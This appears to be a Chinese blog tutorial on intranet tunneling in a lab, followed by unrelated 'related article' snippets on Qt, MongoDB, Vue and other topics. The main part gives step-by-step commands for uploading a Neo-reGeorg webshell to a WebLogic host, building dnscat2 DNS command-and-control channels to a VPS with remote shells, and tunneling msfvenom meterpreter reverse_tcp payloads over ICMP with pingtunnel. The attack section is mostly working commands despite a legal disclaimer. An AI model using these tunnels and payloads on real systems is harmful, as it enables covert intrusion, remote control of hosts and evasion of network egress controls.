内网隧道—HTTP\DNS\ICMP
本文仅限于安全研究和学习,用户承担因使用此工具而导致的所有法律和相关责任! 作者不承担任何法律和相关责任!
HTTP隧道
Neo-reGeorg
Neo-reGeorg 是一个旨在积极重构 reGeorg 的项目,目的是:
提高可用性,避免特征检测
提高 tunnel 连接安全性
提高传输内容保密性
应对更多的网络环境场景下使用
靶场环境:cve-2017-10271 weblogic
#靶场攻击过程,使用脚本工具得到shell,在此略过
1.设置密码生成 tunnel.(aspx|ashx|jsp|jspx|php) 并上传到WEB服务器
2.使用蚁剑上传JSP文件
上传至此目录:可以访问到文件
/root/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/
3.使用 neoreg.py 连接WEB服务器,在本地建立 socks 代理,代理默认端口 1080
修改配置文件:vim proxychains4.conf
执行命令:
#测试代理: proxychains curl 127.0.0.1:7001
DNS隧道
Dnscat2
dnscat2是一个DNS隧道工具,通过DNS协议创建加密的命令和控制通道,它的一大
特色就是服务端会有一个命令行控制台,所有的指令都可以在该控制台内完成。包
括:文件上传、下载、反弹Shell。
直连模式:客户端直接向指定IP的恶意DNS服务器发起DNS解析请求。
中继模式:像我们平时上网一样,DNS解析先经过互联网的迭代解析,最后指向我们
的恶意DNS服务器。相比直连,速度较慢,但是更安全。
服务端安装
apt install ruby ruby-dev git make g++ ruby-bundler
gem install bundler
git clone https://github.com/iagox86/dnscat2.git(也可以先下载文件,然后上传至VPS)
cd dnscat2/server
bundle install #如此命令报错,和本地网络有关,多试几次
客户端编译
Linux:
git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/client/
makeWindows:
下载Windows版本
在本地编译上传
上传已经编译好的 .exe程序
make编译之后会在此目录下生成一个dnscat可执行二进制文件。
Linux systemd-resolve占用53端口的解决方法: https://www.itren.org/319.html
Dnscat2直连模式
启动服务端
ruby ./dnscat2.rb
启动客户端
vps收到会话
help
windows
进入session 1: session -i 1
shell #获取主机shell
进入session 2 : session -i 2
执行命令:
whoami
直连模式流量特征:tcpdump udp dst port 53
Dnscat2中继模式
环境准备:
1. 一台公网C&C服务器
2. 一台内网靶机 #以win7为例
3. 一个可配置解析的域名
配置DNS域名解析:
创建A记录,将自己的域名解析服务器(ns.hack.com)指向云服务器(VPS IP)A类解析是在告诉域名系统,ns.hacker.com的IP地址是 xxx.xxx.xxx.xxx
创建NS记录,将子域名 dns.hetian.cn 的DNS解析交给 ns.hack.com
NS解析是在告诉域名系统,想要知道 dns.hack.com 的IP地址,就去问ns.hacker.com
vps防火墙设置:开放全部UDP端口
启动服务端
ruby ./dnscat2.rb dns.xxx.xxx --secret=abcd
secret --指定密码
启动客户端
server #指定VPS地址
服务端收到session 3
获取shell
进入会话:session -i 4
执行命令: whoami
ICMP隧道
Pingtunnel
ICMP隧道
通过某种信道获取了内网主机的shell,但是当前信道不适合做远控的通信信道,
tcp 和 udp 等传输层协议不能出网, dns 、 http 等应用层协议也不能出网,只有
icmp 协议可以出网。
目的:上线仅icmp协议出网的内网主机
ICMP隧道转发TCP上线MSF
1.VPS启动ICMP隧道服务端
./pingtunnel -type server -noprint 1 -nolog 1
2.靶机启动ICMP隧道客户端
pingtunnel.exe -type client -l 127.0.0.1:9999 -s vpsip -t vpsip:7777 -tcp 1 -noprint 1 -nolog 1
3. MSF 生成反弹 shell 的 payload 上传到靶机
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=127.0.0.1 lport=9999 -f exe > hot.exe
4.执行 payload 反弹 shell 到 MSF
设置侦听:
msfconsole
use exploit/multi/handler
set lhost xx.xx.xx.xx (vps的内网IP)
set lport 8866
set payload windows/x64/meterpreter/reverse_tcp
exploit
5. 靶机执行payload,msf上线
ICMP隧道转发Socks上线MSF
1. VPS启动ICMP隧道服务端
./pingtunnel -type server -noprint 1 -nolog 1
2.靶机启动ICMP隧道客户端
pingtunnel.exe -type client -l 127.0.0.1:9999 -s VPSIP -sock5 1 -noprint 1 -nolog 1
# icmp隧道客户端监听127.0.0.1:9999启动socks5服务,
通过连接到VPS IP的icmp隧道,
由icmpserver转发socks5代理请求到目的地址 VPSIP:8899
3.MSF 生成反弹 shell 的 payload 上传到靶机,并执行
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=VPSIP lport=8866 HttpProxyType=SOCKS HttpProxyHost=127.0.0.1 HttpProxyPort=9999 -f exe > c2.exe
5.设置侦听
handler -p windows/x64/meterpreter/reverse_tcp -H xx.xx.xx.xx -P8866
#IP是vps的内网IP
6.MSF收到会话
可以执行命令
参考:
内网渗透之内网穿透 - 先知社区
...
相关文章:
内网隧道—HTTP\DNS\ICMP
本文仅限于安全研究和学习,用户承担因使用此工具而导致的所有法律和相关责任! 作者不承担任何法律和相关责任! HTTP隧道 Neo-reGeorg Neo-reGeorg 是一个旨在积极重构 reGeorg 的项目,目的是: 提高可用性࿰…...
QT mouseTracking
在Qt中要捕捉鼠标移动事件需要重写MouseMoveEvent,但是MouseMoveEvent为了不太耗资源在默认状态下是要鼠标按下才能捕捉到。要想鼠标不按下时的移动也能捕捉到,需要setMouseTracking(true)。 如果鼠标跟踪失效(默认),…...
java操作mongdb【超详细】
Java操作 搭建 搭建 依赖 <!--mongodb--><dependency><groupId>org.springframework.boot</groupId><artifactId>spring-boot-starter-data-mongodb</artifactId></dependency>配置文件 spring:data:mongodb:host…...
JavaScript函数
什么是函数? 在 JavaScript 中,函数是一段被封装起来用于特定任务的可重复使用的代码块。 例如: function logger() {console.log(IT知识一享); }这样就创造了logger()函数,后续可以重复利用这个函数让它输出日志,后…...
RISC-V公测平台发布 · 使用YCSB测试SG2042上的MySQL性能
实验介绍: YCSB(全称为Yahoo! Cloud Serving Benchmark),该性能测试工具由Java语言编写(在之前的MC文章中也提到过这个,如果没看过的读者可以去看看之前MC那一期),主要用于云端或者…...
母婴即时零售行业数据可视化分析
对新晋父母来说,很多母婴用品如同一位贴心的助手,为他们的宝宝提供温暖和呵护。从婴儿床垫到可爱的拼图玩具,每一件用品都是为宝宝的成长和发展量身定制。对于繁忙的父母们而言,这些用品不仅帮助照顾孩子,更是为他们减…...
快速解决IDEA中类的图标变成J,不是C的情况
有时候导入新的项目后,会出现如下情况,类的图标变成J,如图: 直接上解决方法: 找到项目的pom.xml,右键,在靠近最下方的位置找到Add as Maven Project,点击即可。 此时,一般类的图标就…...
vue学习笔记
1.官网 v2官网 https://v2.cn.vuejs.org/ v3官网 https://cn.vuejs.org/ 2.vue引入 在线引入 <script src"https://cdn.jsdelivr.net/npm/vue2.7.14/dist/vue.js"></script> 下载引入(下载链接) https://v2.cn.vuejs.org/js/vue.js 3.初始化渲…...
难解的bug
android.app.RemoteServiceException: Context.startForegroundService() did not then call Service.startForeground(): ServiceRecord 【Android TimeCat】 解决 context.startforegroundservice() did not then call service.startforeground() | XiChens Blog http://www…...
人文景区有必要做VR云游吗?如何满足游客出行需求?
VR云游在旅游行业中的应用正在快速增长,为游客带来沉浸式体验的同时,也为文旅景区提供了新的营销方式。很多人说VR全景展示是虚假的,比不上真实的景区触感,人文景区真的有必要做VR云游吗?我的答案是很有必要。 如果你认…...
【字节跳动青训营】后端笔记整理-1 | Go语言入门指南:基础语法和常用特性解析
**本人是第六届字节跳动青训营(后端组)的成员。本文由博主本人整理自该营的日常学习实践,首发于稀土掘金:🔗Go语言入门指南:基础语法和常用特性解析 | 青训营 本文主要梳理自第六届字节跳动青训营ÿ…...
3.解构赋值
解构赋值是一种快速为变量赋值的简洁语法,本质上仍然是为变量赋值。 3.1数组解构 数组解构是 将数组的单元值快速批量赋值给一系列变量 的简洁语法 1.基本语法: (1)赋值运算符左侧的[ ]用于批量声明变量,右侧数组的单元值将被赋…...
ChatGPT在智能游戏和游戏AI中的应用如何?
ChatGPT在智能游戏和游戏AI领域具有广泛的应用潜力,可以为游戏体验增添智能和交互性,同时也有助于游戏开发者创造更丰富、更引人入胜的游戏内容。以下将详细探讨ChatGPT在智能游戏和游戏AI中的应用。 ## 1. 游戏角色的智能化 在角色扮演游戏࿰…...
【安卓串口通信】
安卓串口通信需要使用到串口适配器和USB OTG线。首先需要在Android设备上安装串口调试助手或其他支持串口通信的应用程序。然后将串口适配器连接到Android设备,使用USB OTG线连接即可。 接下来,您需要打开串口调试助手或其他应用程序,…...
电气测试相关
项目: 长期过电压 瞬态过电压 瞬态欠压 跳跃启动 卸载 纹波电压 电源电压缓慢下降和上升 电源电压缓慢下降、快速上升 复位行为 短暂中断 启动脉冲 带电气系统控制的电压曲线 引脚中断 连接器中断 反极性 信号线和负载电路短路 启动行为 对分流不…...
ProsperEx 的野望:借势 RWA 浪潮,构建全新的链上衍生品体系
真实资产代币化(RWA)并不是一个新概念了,以 USDT、USDC、DAI 等一系列美元稳定币是行业内最早的 RWA 概念资产,这些资产以美元为价值基础通过不同信用的机制,将其价值映射至链上,并以加密货币的形式体现&am…...
Spring Data JPA 详解
目录 一、概述1.1 JPA简介1.2 Spring Data JPA简介 二、配置及应用2.1 环境配置2.2 依赖添加2.3 实体类创建2.4 Repository接口创建2.5 示例程序运行 三、实体映射3.1 注解3.2 关系映射 四、Repository接口4.1 基本增删改查4.2 自定义查询方法4.3 使用 Sort 和 Pageable 进行排…...
NZ系列工具NZ02:VBA读取PDF使用说明
【分享成果,随喜正能量】时光绽放并蒂莲,更是一份殷殷嘱托,更是一份诚挚祝福,是一份时光馈赠,又是一份时光陪伴。。 我的教程一共九套及VBA汉英手册一部,分为初级、中级、高级三大部分。是对VBA的系统讲解…...
Autocasting和GradScaler
Autocasting和GradScaler是什么 torch.autocast 是一个上下文管理器,它可以将数据类型从 float32 自动转换为 float16。这可以提高性能,因为 float16 比 float32 更小,因此可以更快地处理。torch.cuda.amp.GradScaler 是一个类,它…...
头条移动端项目Day03 —— 自媒体素材管理、自媒体文章管理、自媒体文章发布
❤ 作者主页:欢迎来到我的技术博客😎 ❀ 个人介绍:大家好,本人热衷于Java后端开发,欢迎来交流学习哦!( ̄▽ ̄)~* 🍊 如果文章对您有帮助,记得关注、点赞、收藏、…...
网络编程(Modbus进阶)
思维导图 Modbus RTU(先学一点理论) 概念 Modbus RTU 是工业自动化领域 最广泛应用的串行通信协议,由 Modicon 公司(现施耐德电气)于 1979 年推出。它以 高效率、强健性、易实现的特点成为工业控制系统的通信标准。 包…...
Linux 文件类型,目录与路径,文件与目录管理
文件类型 后面的字符表示文件类型标志 普通文件:-(纯文本文件,二进制文件,数据格式文件) 如文本文件、图片、程序文件等。 目录文件:d(directory) 用来存放其他文件或子目录。 设备…...
相机Camera日志实例分析之二:相机Camx【专业模式开启直方图拍照】单帧流程日志详解
【关注我,后续持续新增专题博文,谢谢!!!】 上一篇我们讲了: 这一篇我们开始讲: 目录 一、场景操作步骤 二、日志基础关键字分级如下 三、场景日志如下: 一、场景操作步骤 操作步…...
java 实现excel文件转pdf | 无水印 | 无限制
文章目录 目录 文章目录 前言 1.项目远程仓库配置 2.pom文件引入相关依赖 3.代码破解 二、Excel转PDF 1.代码实现 2.Aspose.License.xml 授权文件 总结 前言 java处理excel转pdf一直没找到什么好用的免费jar包工具,自己手写的难度,恐怕高级程序员花费一年的事件,也…...
基于服务器使用 apt 安装、配置 Nginx
🧾 一、查看可安装的 Nginx 版本 首先,你可以运行以下命令查看可用版本: apt-cache madison nginx-core输出示例: nginx-core | 1.18.0-6ubuntu14.6 | http://archive.ubuntu.com/ubuntu focal-updates/main amd64 Packages ng…...
关于iview组件中使用 table , 绑定序号分页后序号从1开始的解决方案
问题描述:iview使用table 中type: "index",分页之后 ,索引还是从1开始,试过绑定后台返回数据的id, 这种方法可行,就是后台返回数据的每个页面id都不完全是按照从1开始的升序,因此百度了下,找到了…...
实现弹窗随键盘上移居中
实现弹窗随键盘上移的核心思路 在Android中,可以通过监听键盘的显示和隐藏事件,动态调整弹窗的位置。关键点在于获取键盘高度,并计算剩余屏幕空间以重新定位弹窗。 // 在Activity或Fragment中设置键盘监听 val rootView findViewById<V…...
有限自动机到正规文法转换器v1.0
1 项目简介 这是一个功能强大的有限自动机(Finite Automaton, FA)到正规文法(Regular Grammar)转换器,它配备了一个直观且完整的图形用户界面,使用户能够轻松地进行操作和观察。该程序基于编译原理中的经典…...
在Mathematica中实现Newton-Raphson迭代的收敛时间算法(一般三次多项式)
考察一般的三次多项式,以r为参数: p[z_, r_] : z^3 (r - 1) z - r; roots[r_] : z /. Solve[p[z, r] 0, z]; 此多项式的根为: 尽管看起来这个多项式是特殊的,其实一般的三次多项式都是可以通过线性变换化为这个形式…...
【p2p、分布式,区块链笔记 MESH】Bluetooth蓝牙通信 BLE Mesh协议的拓扑结构 定向转发机制
目录 节点的功能承载层(GATT/Adv)局限性: 拓扑关系定向转发机制定向转发意义 CG 节点的功能 节点的功能由节点支持的特性和功能决定。所有节点都能够发送和接收网格消息。节点还可以选择支持一个或多个附加功能,如 Configuration …...